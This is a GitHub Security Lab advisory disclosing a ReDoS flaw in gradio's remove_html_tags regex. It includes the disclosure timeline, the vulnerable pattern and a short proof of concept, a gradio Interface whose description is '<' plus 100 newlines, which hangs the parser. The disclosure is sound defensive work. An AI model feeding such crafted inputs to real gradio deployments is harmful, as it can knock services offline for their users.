Coordinated Disclosure Timeline
- 2024-10-07: Reported via PVR: https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m
- 2025-01-09: Asked for an update.
- 2025-01-15: No response on https://github.com/gradio-app/gradio/security/advisories/GHSA-43j2-q53f-mp9m, so I posted a public PR with the fix: https://github.com/gradio-app/gradio/pull/10368
Summary
remove_html_tags
uses a regex that has a ReDoS vulnerability.
Project
gradio
Tested Version
Details
ReDoS in remove_html_tags (GHSL-2024-273
)
The HTML_TAG_RE
regex, which is used by remove_html_tags
contains a ReDoS vulnerability:
HTML_TAG_RE = re.compile("<[^>]*?(?:\n[^>]*?)*>", re.DOTALL)
Proof of concept:
If you start gradio like this, it gets stuck in a very long running loop:
import gradio as gr
def greet(name, intensity):
return "Hello " * intensity + name + "!"
demo = gr.Interface(
fn=greet,
inputs=["text", "slider"],
outputs=["text"],
description = "<" + "\n" * 100
)
demo.launch()
It is possible that this vulnerability may lead to DoS in Gradio playground using specially crafted code.
This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.
Impact
This issue may lead to denial of service.
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2024-273
in any communication regarding this issue.